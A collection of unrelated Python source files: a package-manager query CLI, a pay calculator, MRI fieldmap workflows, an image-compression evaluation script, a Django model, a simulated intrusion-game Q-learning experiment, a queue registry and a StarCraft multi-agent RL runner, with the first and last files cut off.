import gentoopm.filters as f
import gentoopm.matchers as m
our_imports = (
('pm', pm),
('f', f),
('m', m))
welc = '''The following objects have been imported for you:\n'''
welc += '\n'.join(['\t%s: %s' % (key, repr(var))
for key, var in our_imports])
kwargs = {}
try:
from IPython import embed
except ImportError:
try:
from IPython.Shell import IPShellEmbed
except ImportError:
print('For better user experience, install IPython.')
from code import InteractiveConsole
embed = InteractiveConsole({'pm': pm}).interact
kwargs['banner'] = welc
else:
embed = IPShellEmbed()
embed.set_banner(embed.IP.BANNER + '\n\n' + welc)
else:
kwargs['banner2'] = welc
embed(**kwargs)
def __iter__(self):
for k in dir(self):
if k.startswith('_'):
continue
cls = getattr(self, k)
yield (k.replace('_', '-'), cls.help(), cls)
class PMQueryCLI(object):
""" A CLI for gentoopmq. """
def __init__(self):
self.argparser = arg = argparse.ArgumentParser()
all_pms = frozenset(_supported_pms)
arg.add_argument('-V', '--version',
action='version', version='%s %s' % (arg.prog, PV))
arg.add_argument('-p', '--package-manager',
action='store', help='Use a specific package manager',
choices=all_pms)
subp = arg.add_subparsers(title = 'Sub-commands')
for cmd_name, cmd_help, cmd_class in PMQueryCommands():
p = subp.add_parser(cmd_name, help=cmd_help)
cmd_class(p)
def main(self, argv):
arg = self.argparser
arg.prog = os.path.basename(argv[0])
args = arg.parse_args(argv[1:])
if args.package_manager is not None:
pm = get_pm(args.package_manager)
else:
try:
pm = get_package_manager()
except Exception:
arg.error('No working package manager could be found.')
return args.instance(pm, args) or 0
|
py
|
1a5eed868d8a1b7fc672cd8556318a4dda7cf8c8
|
###################
Python 2.7.12
###################
try:
hrs = float(raw_input("Enter Hours: "))
pay = float(raw_input("Enter pay: "))
overtime_pay_rate = 1.5
if hrs < 40:
print hrs * pay
else:
extra_hrs = hrs - 40 #5hours
pay_for_extra_hour = pay * 1.5 #15.75
overtime_pay = extra_hrs * pay_for_extra_hour #78.75
normal_pay = 40 * pay #420
print normal_pay + overtime_pay
except:
print("Please enter a number");
|
py
|
1a5eedd290c4a502ec42609b9585edeb43edc9b2
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Processing phase-difference (aka :abbr:`GRE (gradient-recalled echo)`) fieldmaps.
.. _gre-fieldmaps:
Workflows for processing :abbr:`GRE (gradient recalled echo)` fieldmaps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Workflows for preparing the magnitude part of :abbr:`GRE (gradient-recalled echo)` fieldmap
images and cleaning up the fieldmaps created from the phases or phasediff.
"""
from nipype.pipeline import engine as pe
from nipype.interfaces import utility as niu, fsl, ants
from niflow.nipype1.workflows.dmri.fsl.utils import cleanup_edge_pipeline
from niworkflows.engine.workflows import LiterateWorkflow as Workflow
from niworkflows.interfaces.images import IntraModalMerge
from niworkflows.interfaces.masks import BETRPT
def init_magnitude_wf(omp_nthreads, name='magnitude_wf'):
"""
Prepare the magnitude part of :abbr:`GRE (gradient-recalled echo)` fieldmaps.
Average (if not done already) the magnitude part of the
:abbr:`GRE (gradient recalled echo)` images, run N4 to
correct for B1 field nonuniformity, and skull-strip the
preprocessed magnitude.
Workflow Graph
.. workflow ::
:graph2use: orig
:simple_form: yes
from sdcflows.workflows.fmap import init_magnitude_wf
wf = init_magnitude_wf(omp_nthreads=6)
Parameters
----------
omp_nthreads : int
Maximum number of threads an individual process may use
name : str
Name of workflow (default: ``prepare_magnitude_w``)
Inputs
------
magnitude : pathlike
Path to the corresponding magnitude path(s).
Outputs
-------
fmap_ref : pathlike
Path to the fieldmap reference calculated in this workflow.
fmap_mask : pathlike
Path to a binary brain mask corresponding to the reference above.
"""
workflow = Workflow(name=name)
inputnode = pe.Node(
niu.IdentityInterface(fields=['magnitude']), name='inputnode')
outputnode = pe.Node(
niu.IdentityInterface(fields=['fmap_ref', 'fmap_mask', 'mask_report']),
name='outputnode')
# Merge input magnitude images
magmrg = pe.Node(IntraModalMerge(), name='magmrg')
# de-gradient the fields ("bias/illumination artifact")
n4_correct = pe.Node(ants.N4BiasFieldCorrection(dimension=3, copy_header=True),
name='n4_correct', n_procs=omp_nthreads)
bet = pe.Node(BETRPT(generate_report=True, frac=0.6, mask=True),
name='bet')
workflow.connect([
(inputnode, magmrg, [('magnitude', 'in_files')]),
(magmrg, n4_correct, [('out_file', 'input_image')]),
(n4_correct, bet, [('output_image', 'in_file')]),
(bet, outputnode, [('mask_file', 'fmap_mask'),
('out_file', 'fmap_ref'),
('out_report', 'mask_report')]),
])
return workflow
def init_fmap_postproc_wf(omp_nthreads, fmap_bspline, median_kernel_size=5,
name='fmap_postproc_wf'):
"""
Postprocess a B0 map estimated elsewhere.
This workflow denoises (mostly via smoothing) a B0 fieldmap.
Workflow Graph
.. workflow ::
:graph2use: orig
:simple_form: yes
from sdcflows.workflows.fmap import init_fmap_postproc_wf
wf = init_fmap_postproc_wf(omp_nthreads=6, fmap_bspline=False)
Parameters
----------
omp_nthreads : int
Maximum number of threads an individual process may use
fmap_bspline : bool
Whether the fieldmap should be smoothed and extrapolated to off-brain regions
using B-Spline basis.
median_kernel_size : int
Size of the kernel when smoothing is done with a median filter.
name : str
Name of workflow (default: ``fmap_postproc_wf``)
Inputs
------
fmap_mask : pathlike
A brain binary mask corresponding to this fieldmap.
fmap_ref : pathlike
A preprocessed magnitude/reference image for the fieldmap.
fmap : pathlike
A B0-field nonuniformity map (aka fieldmap) estimated elsewhere.
Outputs
-------
out_fmap : pathlike
Postprocessed fieldmap.
"""
workflow = Workflow(name=name)
inputnode = pe.Node(niu.IdentityInterface(
fields=['fmap_mask', 'fmap_ref', 'fmap', 'metadata']), name='inputnode')
outputnode = pe.Node(niu.IdentityInterface(fields=['out_fmap', 'metadata']),
name='outputnode')
if fmap_bspline:
from ..interfaces.fmap import FieldEnhance
# despike_threshold=1.0, mask_erode=1),
fmapenh = pe.Node(
FieldEnhance(unwrap=False, despike=False),
name='fmapenh', mem_gb=4, n_procs=omp_nthreads)
workflow.connect([
(inputnode, fmapenh, [('fmap_mask', 'in_mask'),
('fmap_ref', 'in_magnitude'),
('fmap_hz', 'in_file')]),
(fmapenh, outputnode, [('out_file', 'out_fmap')]),
])
else:
recenter = pe.Node(niu.Function(function=_recenter),
name='recenter', run_without_submitting=True)
denoise = pe.Node(fsl.SpatialFilter(
operation='median', kernel_shape='sphere',
kernel_size=median_kernel_size), name='denoise')
demean = pe.Node(niu.Function(function=_demean), name='demean')
cleanup_wf = cleanup_edge_pipeline(name="cleanup_wf")
workflow.connect([
(inputnode, cleanup_wf, [('fmap_mask', 'inputnode.in_mask')]),
(inputnode, recenter, [(('fmap', _pop), 'in_file')]),
(recenter, denoise, [('out', 'in_file')]),
(denoise, demean, [('out_file', 'in_file')]),
(demean, cleanup_wf, [('out', 'inputnode.in_file')]),
(cleanup_wf, outputnode, [('outputnode.out_file', 'out_fmap')]),
(inputnode, outputnode, [(('metadata', _pop), 'metadata')]),
])
return workflow
def _recenter(in_file):
"""Recenter the phase-map distribution to the -pi..pi range."""
from os import getcwd
import numpy as np
import nibabel as nb
from nipype.utils.filemanip import fname_presuffix
nii = nb.load(in_file)
data = nii.get_fdata(dtype='float32')
msk = data != 0
msk[data == 0] = False
data[msk] -= np.median(data[msk])
out_file = fname_presuffix(in_file, suffix='_recentered',
newpath=getcwd())
nb.Nifti1Image(data, nii.affine, nii.header).to_filename(out_file)
return out_file
def _demean(in_file, in_mask=None, usemode=True):
"""
Subtract the median (since it is robuster than the mean) from a map.
Parameters
----------
usemode : bool
Use the mode instead of the median (should be even more robust
against outliers).
"""
from os import getcwd
import numpy as np
import nibabel as nb
from nipype.utils.filemanip import fname_presuffix
nii = nb.load(in_file)
data = nii.get_fdata(dtype='float32')
msk = np.ones_like(data, dtype=bool)
if in_mask is not None:
msk[nb.load(in_mask).get_fdata(dtype='float32') < 1e-4] = False
if usemode:
from scipy.stats import mode
data[msk] -= mode(data[msk], axis=None)[0][0]
else:
data[msk] -= np.median(data[msk], axis=None)
out_file = fname_presuffix(in_file, suffix='_demean',
newpath=getcwd())
nb.Nifti1Image(data, nii.affine, nii.header).to_filename(out_file)
return out_file
def _pop(inlist):
if isinstance(inlist, (tuple, list)):
return inlist[0]
return inlist
|
py
|
1a5eee429ad996a94703e1492f3a34bb2a8c15bf
|
import torch
from torchvision import transforms
import matplotlib.pyplot as plt
import os
from PIL import Image
import PIL
import glob
import numpy as np
from model_new import *
from model import *
from models.temp import Cheng2020Attention
from models.temp_and_FIF import Cheng2020Attention_FIF
from models.temp_1bpp import Cheng2020Attention_1bpp
from models.temp_016bpp import Cheng2020Attention_0_16bpp
from models.temp_highBitRate import Cheng2020Attention_highBitRate2
from models.test_freqSepNet import Cheng2020Attention_freqSep
import gzip
import pytorch_msssim
from utils.Conditional_Entropy import compute_conditional_entropy
#/home/access/dev/data_sets/kitti/flow_2015/data_scene_flow
save_img_and_recon_for_GPNN = False
device = 'cuda' if torch.cuda.is_available() else 'cpu'
#model = Cheng2020Attention_1bpp()
#model = Cheng2020Attention_0_16bpp()
model1 = Cheng2020Attention_highBitRate2()
#model2 = Cheng2020Attention_highBitRate2()
#model = Cheng2020Attention_highBitRate2()
pretrained_model_path1 = '/home/access/dev/iclr_17_compression/checkpoints_new/new_net/Sharons dataset/ABLATION/0.0625bpp/model_best_weights (1).pth'
#pretrained_model_path2 = ''
checkpoint = torch.load(pretrained_model_path1)
model1.load_state_dict(checkpoint['model_state_dict'])
#checkpoint = torch.load(pretrained_model_path2)
#model2.load_state_dict(checkpoint['model_state_dict'])
model1 = model1.to(device)
model1.eval()
#model2 = model2.to(device)
#model2.eval()
stereo1_dir = '/media/access/SDB500GB/dev/data_sets/kitti/Sharons datasets/data_scene_flow_multiview/testing/image_2'#'/home/access/dev/data_sets/kitti/Sharons datasets/data_scene_flow_multiview/testing/image_2'
#stereo2_dir = '/media/access/SDB500GB/dev/data_sets/kitti/Sharons datasets/data_stereo_flow_multiview/testing/image_2'#'/home/access/dev/data_sets/kitti/Sharons datasets/data_stereo_flow_multiview/testing/image_2'
# smaller dataset:
#stereo1_dir = '/media/access/SDB500GB/dev/data_sets/kitti/data_stereo_flow_multiview/train_small_set_8/image_2'
#stereo2_dir = '/home/access/dev/data_sets/kitti/data_stereo_flow_multiview/train_small_set_8/image_03'
#stereo2_dir = '/home/access/dev/data_sets/kitti/data_stereo_flow_multiview/train_small_set_32/image_3_OF_to_2'
# CLIC view test:
#stereo1_dir = '/home/access/dev/data_sets/CLIC2021/professional_train_2020/im3'
#stereo2_dir = '/home/access/dev/data_sets/CLIC2021/professional_train_2020/im2'
#list1 = glob.glob(os.path.join(stereo1_dir, '*11.png'))
#list2 = glob.glob(os.path.join(stereo2_dir, '*11.png'))
#stereo1_path_list = list1 + list2
stereo1_path_list = glob.glob(os.path.join(stereo1_dir, '*.png'))
#stereo1_path_list = glob.glob(os.path.join('/home/access/dev/Holopix50k/test/left', '*.jpg'))
#transform = transforms.Compose([transforms.Resize((192, 608), interpolation=PIL.Image.BICUBIC), transforms.ToTensor()])
#transform = transforms.Compose([transforms.CenterCrop((320, 320)), transforms.ToTensor()])
transform = transforms.Compose([transforms.CenterCrop((320, 1224)), transforms.ToTensor()])
#transform = transforms.Compose([transforms.CenterCrop((360, 360)), transforms.ToTensor()])
#transform = transforms.Compose([transforms.Resize((320, 960), interpolation=Image.BICUBIC), transforms.ToTensor()])
#transform = transforms.Compose([transforms.CenterCrop((370, 740)),transforms.Resize((128, 256), interpolation=3), transforms.ToTensor()])
#transform = transforms.Compose([transforms.ToTensor()])
for i in range(len(stereo1_path_list)):
img_stereo1 = Image.open(stereo1_path_list[i])
#img_stereo2_name = stereo1_path_list[i].replace('left', 'right')
img_stereo2_name = stereo1_path_list[i].replace('image_2', 'image_3')
img_stereo2 = Image.open(img_stereo2_name)
input1 = transform(img_stereo1)
input2 = transform(img_stereo2)
# cut image H*W to be a multiple of 16
M = 32
shape = input1.size()
input1 = input1[:, :M * (shape[1] // M), :M * (shape[2] // M)]
input2 = input2[:, :M * (shape[1] // M), :M * (shape[2] // M)]
##
input1 = input1[None, ...].to(device)
input2 = input2[None, ...].to(device)
# Decoded images of two models, use average to reduce noise
_, _, final_im1_recon1, z1_down = model1(input1, input2)
#_, _, final_im1_recon2, _ = model2(input1, input2)
numpy_input_image = torch.squeeze(input1).permute(1, 2, 0).cpu().detach().numpy()
numpy_output_image1 = torch.squeeze(final_im1_recon1).permute(1, 2, 0).cpu().detach().numpy()
#numpy_output_image2 = torch.squeeze(final_im1_recon2).permute(1, 2, 0).cpu().detach().numpy()
'''
diff1 = numpy_input_image - numpy_output_image1
diff1 = (diff1 - diff1.min())/(diff1.max() - diff1.min())
#diff2 = 128 + (original - numpy_output_image2)
fig, (ax1, ax2, ax3) = plt.subplots(3, 1)
#fig.suptitle('Original, Diff - 0.03_bpp, 0.06_bpp')
fig.suptitle('Original, Recon, Diff (0.06_bpp Ablation)')
ax1.imshow(numpy_input_image)
ax2.imshow(numpy_output_image1)
ax3.imshow(diff1)
fig.tight_layout()
plt.show()
'''
if True:
_, _, final_im1_recon2, z1_down = model1(input2, input2)
numpy_output_SI = torch.squeeze(final_im1_recon2).permute(1, 2, 0).cpu().detach().numpy()
orig_path = '/media/access/SDB500GB/dev/data_sets/kitti/Ablation/original/'
orig_si_path = '/media/access/SDB500GB/dev/data_sets/kitti/Ablation/SI/'
rec_path = '/media/access/SDB500GB/dev/data_sets/kitti/Ablation/recon-original/'
rec_SI_path = '/media/access/SDB500GB/dev/data_sets/kitti/Ablation/recon-SI/'
orig_si_numpy = torch.squeeze(input2).permute(1, 2, 0).cpu().detach().numpy()
orig_si_image = Image.fromarray((orig_si_numpy*255).astype(np.uint8))
orig_image = Image.fromarray((numpy_input_image*255).astype(np.uint8))
rec_SI_img = Image.fromarray((numpy_output_SI*255).astype(np.uint8))
rec_img = Image.fromarray((numpy_output_image1*255).astype(np.uint8))
orig_si_image.save(orig_si_path+stereo1_path_list[i][-13:])
orig_image.save(orig_path+stereo1_path_list[i][-13:])
rec_SI_img.save(rec_SI_path+stereo1_path_list[i][-13:])
rec_img.save(rec_path + stereo1_path_list[i][-13:])
|
py
|
1a5eee5b3da99a9b1f84ec0399daa7826633962d
|
from django.db import models as djangorm
import django.db.utils
from util import staticproperty
# declare identifiers for MovementType constants
INFANTRY = None
CAVALRY = None
ARMORED = None
FLIER = None
class MovementType(djangorm.Model):
#{
id = djangorm.CharField(max_length=4, primary_key=True)
name = djangorm.CharField(max_length=10)
def __str__(self):
return self.name
def __repr__(self):
return 'MovementType {name: "%s"}' % self.name
@staticproperty
def INFANTRY():
return INFANTRY
@staticproperty
def CAVALRY():
return CAVALRY
@staticproperty
def ARMORED():
return ARMORED
@staticproperty
def FLIER():
return FLIER
#}
# give constants their values now that MovementType is defined
try:
INFANTRY = MovementType.objects.filter(pk='1Inf').first()
CAVALRY = MovementType.objects.filter(pk='2Cav').first()
ARMORED = MovementType.objects.filter(pk='3Arm').first()
FLIER = MovementType.objects.filter(pk='4Fly').first()
except django.db.utils.OperationalError:
pass
|
py
|
1a5eef616dc9952a86c0e52af7218a2b658a01af
|
import os
import time
import sys
import glob
from gym_idsgame.config.runner_mode import RunnerMode
from gym_idsgame.agents.training_agents.q_learning.q_agent_config import QAgentConfig
from gym_idsgame.agents.dao.agent_type import AgentType
from gym_idsgame.config.client_config import ClientConfig
from gym_idsgame.runnner import Runner
from experiments.util import plotting_util, util
def get_script_path():
"""
:return: the script path
"""
return os.path.dirname(os.path.realpath(sys.argv[0]))
def default_output_dir() -> str:
"""
:return: the default output dir
"""
script_dir = get_script_path()
return script_dir
def default_config_path() -> str:
"""
:return: the default path to configuration file
"""
config_path = os.path.join(default_output_dir(), './config.json')
return config_path
def default_config() -> ClientConfig:
"""
:return: Default configuration for the experiment
"""
q_agent_config = QAgentConfig(gamma=0.999, alpha=0.0005, epsilon=1, render=False, eval_sleep=0.9,
min_epsilon=0.01, eval_episodes=100, train_log_frequency=100,
epsilon_decay=0.9999, video=True, eval_log_frequency=1,
video_fps=5, video_dir=default_output_dir() + "/results/videos", num_episodes=20001,
eval_render=False, gifs=True, gif_dir=default_output_dir() + "/results/gifs",
eval_frequency=1000, attacker=True, defender=False, video_frequency=101,
save_dir=default_output_dir() + "/results/data")
env_name = "idsgame-random_defense-v3"
client_config = ClientConfig(env_name=env_name, attacker_type=AgentType.TABULAR_Q_AGENT.value,
mode=RunnerMode.TRAIN_ATTACKER.value,
q_agent_config=q_agent_config, output_dir=default_output_dir(),
title="TrainingQAgent vs RandomDefender",
random_seeds=[0, 999, 299, 399, 499], run_many=True
)
return client_config
def write_default_config(path:str = None) -> None:
"""
Writes the default configuration to a json file
:param path: the path to write the configuration to
:return: None
"""
if path is None:
path = default_config_path()
config = default_config()
util.write_config_file(config, path)
def plot_csv(config: ClientConfig, eval_csv_path:str, train_csv_path: str, attack_stats_csv_path : str = None,
random_seed : int = 0) -> None:
"""
Plot results from csv files
:param config: client config
:param eval_csv_path: path to the csv file with evaluation results
:param train_csv_path: path to the csv file with training results
:param random_seed: the random seed of the experiment
:param attack_stats_csv_path: path to attack stats
:return: None
"""
plotting_util.read_and_plot_results(train_csv_path, eval_csv_path,
config.q_agent_config.train_log_frequency,
config.q_agent_config.eval_frequency, config.q_agent_config.eval_log_frequency,
config.q_agent_config.eval_episodes, config.output_dir, sim=False,
random_seed = random_seed, attack_stats_csv_path = attack_stats_csv_path)
def plot_average_results(experiment_title :str, config: ClientConfig, eval_csv_paths:list,
train_csv_paths: str) -> None:
"""
Plots average results after training with different seeds
:param experiment_title: title of the experiment
:param config: experiment config
:param eval_csv_paths: paths to csv files with evaluation data
:param train_csv_paths: path to csv files with training data
:return: None
"""
plotting_util.read_and_plot_average_results(experiment_title, train_csv_paths, eval_csv_paths,
config.q_agent_config.train_log_frequency,
config.q_agent_config.eval_frequency,
config.output_dir)
def run_experiment(configpath: str, random_seed: int, noconfig: bool):
"""
Runs one experiment and saves results and plots
:param configpath: path to experiment config file
:param noconfig: whether to override config
:return: (train_csv_path, eval_csv_path)
"""
if configpath is not None and not noconfig:
if not os.path.exists(args.configpath):
write_default_config()
config = util.read_config(args.configpath)
else:
config = default_config()
time_str = str(time.time())
util.create_artefact_dirs(config.output_dir, random_seed)
logger = util.setup_logger("tabular_q_learning_vs_random_defense-v3", config.output_dir + "/results/logs/" +
str(random_seed) + "/",
time_str=time_str)
config.q_agent_config.save_dir = default_output_dir() + "/results/data/" + str(random_seed) + "/"
config.q_agent_config.video_dir= default_output_dir() + "/results/videos/" + str(random_seed) + "/"
config.q_agent_config.gif_dir= default_output_dir() + "/results/gifs/" + str(random_seed) + "/"
config.logger = logger
config.q_agent_config.logger = logger
config.q_agent_config.random_seed = random_seed
config.random_seed = random_seed
config.q_agent_config.to_csv(config.output_dir + "/results/hyperparameters/" + str(random_seed) + "/" + time_str + ".csv")
train_result, eval_result = Runner.run(config)
train_csv_path = ""
eval_csv_path = ""
if len(train_result.avg_episode_steps) > 0 and len(eval_result.avg_episode_steps) > 0:
train_csv_path = config.output_dir + "/results/data/" + str(random_seed) + "/" + time_str + "_train" + ".csv"
train_result.to_csv(train_csv_path)
eval_csv_path = config.output_dir + "/results/data/" + str(random_seed) + "/" + time_str + "_eval" + ".csv"
eval_result.to_csv(eval_csv_path)
plot_csv(config, eval_csv_path, train_csv_path, random_seed)
return train_csv_path, eval_csv_path
# Program entrypoint
if __name__ == '__main__':
args = util.parse_args(default_config_path())
experiment_title = "Q-learning vs random defense"
if args.configpath is not None and not args.noconfig:
if not os.path.exists(args.configpath):
write_default_config()
config = util.read_config(args.configpath)
else:
config = default_config()
if args.plotonly:
base_dir = default_output_dir() + "/results/data/"
train_csv_paths = []
eval_csv_paths = []
if config.run_many:
for seed in config.random_seeds:
train_csv_path = glob.glob(base_dir + str(seed) + "/*_train.csv")[0]
eval_csv_path = glob.glob(base_dir + str(seed) + "/*_eval.csv")[0]
attack_stats_csv_path = None
try:
attack_stats_csv_paths = glob.glob(base_dir + str(seed) + "/attack_stats_*.csv")
attack_stats_csv_path = list(filter(lambda x: "checkpoint" not in attack_stats_csv_paths, attack_stats_csv_paths))[0]
except:
pass
train_csv_paths.append(train_csv_path)
eval_csv_paths.append(eval_csv_path)
plot_csv(config, eval_csv_path, train_csv_path, attack_stats_csv_path, random_seed=seed)
try:
plot_average_results(experiment_title, config, eval_csv_paths, train_csv_paths)
except Exception as e:
print("Error when trying to plot summary: " + str(e))
else:
train_csv_path = glob.glob(base_dir + str(config.random_seed) + "/*_train.csv")[0]
eval_csv_path = glob.glob(base_dir + str(config.random_seed) + "/*_eval.csv")[0]
attack_stats_csv_path = None
try:
attack_stats_csv_paths = glob.glob(base_dir + str(config.random_seed) + "/attack_stats_*.csv")
attack_stats_csv_path = \
list(filter(lambda x: "checkpoint" not in attack_stats_csv_paths, attack_stats_csv_paths))[0]
except:
pass
train_csv_paths.append(train_csv_path)
eval_csv_paths.append(eval_csv_path)
plot_csv(config, eval_csv_path, train_csv_path, attack_stats_csv_path=attack_stats_csv_path,
random_seed=config.random_seed)
else:
if not config.run_many:
run_experiment(args.configpath, 0, args.noconfig)
else:
train_csv_paths = []
eval_csv_paths = []
for seed in config.random_seeds:
train_csv_path, eval_csv_path = run_experiment(args.configpath, seed, args.noconfig)
train_csv_paths.append(train_csv_path)
eval_csv_paths.append(eval_csv_path)
try:
plot_average_results(experiment_title, config, eval_csv_paths, train_csv_paths)
except Exception as e:
print("Error when trying to plot summary: " + str(e))
|
py
|
1a5ef20d6ba1c710d9075925991baa04444df9eb
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
class ScalableQueues(object):
_queues = {}
@classmethod
def queues(cls):
return cls._queues
@classmethod
def add(cls, name, routing_key="", queue_arguments=None):
queue_arguments = queue_arguments or {}
cls._queues[name] = {"name": name, "routing_key": routing_key or name, "queue_arguments": queue_arguments}
@classmethod
def has_queue(cls, queue):
return queue in cls._queues
@classmethod
def routing_key_for(cls, queue):
return cls._queues[queue]["routing_key"]
|
py
|
1a5ef20fa32f1b6eb64d5257c3feb98252f5bc82
|
import os
from abc import ABC, abstractmethod
from datetime import datetime
from os import path
import torch as th
from tqdm import tqdm
import wandb
from ..controllers import BaseController, DQNController, DRLController, RandomController
from ..encoding import LabelEncoder
from ..envs import SMACEnv
from ..rl.replay import EpisodeReplayBuffer, PrioritizedEpisodeReplayBuffer, Transition
from ..training import TrainingConfig
# th.autograd.set_detect_anomaly(True)
class Runner(ABC):
def __init__(self, trainer: TrainingConfig):
self.training_config = trainer
self.controller: BaseController
@abstractmethod
def make_agent(
self,
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
encoding_output_size,
graph_module_sizes,
action_hidden_size,
):
raise NotImplementedError
@abstractmethod
def run(self):
raise NotImplementedError
class SMACRunner(Runner, ABC):
def __init__(self, trainer: TrainingConfig):
super().__init__(trainer)
self.checkpoint_file = path.join(trainer.log_dir, "checkpoint.pth")
resume_run = path.isfile(self.checkpoint_file)
self.step_num = 0
self.episode_num = 0
previous_step_num = 0
if resume_run:
print("Checkpoint file found, loading initial data...")
checkpoint = th.load(self.checkpoint_file)
previous_step_num = checkpoint["total_steps"]
self.episode_num = checkpoint["n_episodes"]
self.step_num += previous_step_num
if not trainer.resume_run:
trainer.max_num_steps += previous_step_num
if self.step_num >= trainer.max_num_steps:
print("Number of training steps achieved or surpassed. EXITING.")
exit(0)
if not trainer.dry_run:
if not path.exists(trainer.log_dir):
os.makedirs(trainer.log_dir)
args_to_log = trainer.get_loggable_args()
wandb_config = {}
for key in args_to_log:
for subkey in args_to_log[key]:
wandb_config[subkey[0]] = subkey[1]
wandb.init(
project="hcanet",
name=trainer.run_name,
id=trainer.run_name,
dir="/tmp/wandb",
resume=resume_run,
config=wandb_config,
group=trainer.run_prefix,
)
if trainer.episode_priority is None:
self.memory = EpisodeReplayBuffer(trainer.replay_buffer_size)
else:
self.memory = PrioritizedEpisodeReplayBuffer(
trainer.replay_buffer_size,
trainer.replay_buffer_alpha,
)
self.pbar = tqdm(
initial=self.step_num - previous_step_num,
total=trainer.max_num_steps - previous_step_num,
smoothing=0,
)
replay_dir = path.join(trainer.log_dir, "game_replays", trainer.game_name)
self.env = SMACEnv(
map_name=trainer.game_name,
replay_dir=replay_dir,
reward_sparse=trainer.sparse_rewards,
)
env_info = self.env.get_env_info()
self.env.reset()
# this information can only be acquired after the environment is initialized
unit_types = self.env.get_unit_types()
n_agents = env_info["n_agents"]
n_actions = env_info["n_actions"]
# n_agent_features = len(env_info["agent_features"])
# n_enemy_features = len(env_info["enemy_features"])
v2_obs_shape = env_info["obs_shape"]
# get unit types from the environment
# normalize using label encoder
# ignore non-agent unit types
self.node_types = list(LabelEncoder(unit_types).transform(unit_types))
self.node_types = th.tensor(self.node_types[:n_agents], device=trainer.device).int()
agent_types = self.node_types.unique().tolist()
features_by_node_type = [v2_obs_shape] * len(agent_types)
actions_by_node_type = [n_actions] * len(agent_types)
self.controller = self.make_agent(
self.node_types.tolist(),
agent_types,
features_by_node_type,
actions_by_node_type,
trainer.encoding_hidden_size,
trainer.comms_sizes,
trainer.action_hidden_size,
)
if trainer.dry_run:
exit(0)
def sample_from_memory(self):
return (self.memory.sample(self.batch_size) if not self.memory.is_prioritized else
self.memory.sample(self.batch_size, self.replay_buffer_beta))
def maybe_backup_buffer(self):
if (self.step_num % self.replay_buffer_save_interval == 0 and
len(self.memory) >= self.replay_buffer_save_interval):
print("Saving a sample of the replay buffer to file...")
th.save(
self.memory.copy(self.replay_buffer_save_interval),
self.replay_buffer_file,
)
def log_episode(self, things_to_log, prefix="episode"):
# add the prefix to arg names
loggers_poggers = {}
for key in things_to_log:
loggers_poggers[prefix + "/" + key] = things_to_log[key]
wandb.log(loggers_poggers, step=self.step_num)
class OffPolicySMACRunner(SMACRunner):
def make_agent(
self,
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
encoding_output_size,
graph_module_sizes,
action_hidden_size,
):
return DQNController(
self.checkpoint_file,
self.training_config.action_module,
self.training_config.policy,
self.training_config.max_num_steps,
self.training_config.batch_size,
self.training_config.optimizer,
self.training_config.lr,
self.training_config.weight_decay,
self.training_config.rmsprop_alpha,
self.training_config.rmsprop_eps,
self.training_config.trr_coef,
self.training_config.checkpoint_save_secs,
self.training_config.graph_layer_type,
self.training_config.share_encoding,
self.training_config.share_comms,
self.training_config.share_action,
self.training_config.full_agent_communication,
self.training_config.full_receptive_field,
self.training_config.gat_n_heads,
self.training_config.gat_average_last,
self.training_config.rgcn_n2_relations,
self.training_config.rgcn_num_bases,
self.training_config.rgcn_fast,
self.training_config.device,
node_types,
agent_types,
features_by_node_type,
actions_by_node_type,
self.training_config.training_mode,
self.training_config.data_parallel,
self.training_config.act_encoding,
self.training_config.act_comms,
self.training_config.act_action,
self.training_config.use_rnn_encoding,
self.training_config.use_rnn_action,
self.training_config.gamma,
self.training_config.eps_start,
self.training_config.eps_end,
self.training_config.eps_anneal_time,
self.training_config.target_update,
self.training_config.double_dqn,
self.training_config.mixer,
encoding_output_size=encoding_output_size,
graph_module_sizes=graph_module_sizes,
action_hidden_size=action_hidden_size,
)
def run(self):
last_eval = 0
training_start = datetime.now()
while self.step_num < self.training_config.max_num_steps:
step_start = self.step_num
time_start = datetime.now()
episode, episode_reward, info = self.play_episode()
# training_mode is true when not in eval mode
# TODO this variable seems useless
if self.training_config.training_mode:
# Store the transition in memory
self.memory.add(episode)
# self.trainer.maybe_backup_buffer()
# Perform one step of the optimization (on the target network)
if self.memory.can_sample(self.training_config.batch_size):
self.controller.policy_net.train()
self.controller.optimize(self.step_num, self.training_config, self.memory)
self.controller.maybe_save_checkpoint(self.step_num)
# Update the target network, copying all
# weights and biases from the policy network
if self.episode_num % self.training_config.target_update == 0:
self.controller.update_target_net()
things_to_log = {
"episode_reward": episode_reward,
"battles_won": self.env.get_stats()["battles_won"],
"time_secs": (datetime.now() - time_start).total_seconds(),
"num_steps": self.step_num - step_start, }
if "dead_allies" in info:
things_to_log["dead_allies"] = info["dead_allies"]
things_to_log["dead_enemies"] = info["dead_enemies"]
self.log_episode(things_to_log)
# evaluation
# only evaluate if has already been trained
if (self.memory.can_sample(self.training_config.batch_size) and
self.step_num - last_eval >= self.training_config.eval_interval):
last_eval = self.step_num - (self.step_num % self.training_config.eval_interval)
self.evaluate(n_episodes=self.training_config.eval_episodes)
# release GPU cache alongside evaluation
th.cuda.empty_cache()
with open(path.join(self.training_config.log_dir, "run_time.txt"), "a") as f:
f.write(str(datetime.now() - training_start))
self.env.close()
def play_episode(self):
self.env.reset()
current_state = self.env.get_graph_state(
self.node_types,
self.controller.agent_types if self.controller.full_agent_communication else None,
v2=self.training_config.v2_state,
)
self.episode_num += 1
episode_reward = 0
episode_steps = 0
episode = []
done = False
with th.no_grad():
self.controller.policy_net.eval()
self.controller.policy_net.action_layer.init_hidden(1)
while not done:
episode_steps += 1
self.step_num += 1
# I did this and the network learned something
# batch = [t.state.to(self.controller.device) for t in episode] + [current_state]
# batch = Batch.from_data_list(batch)
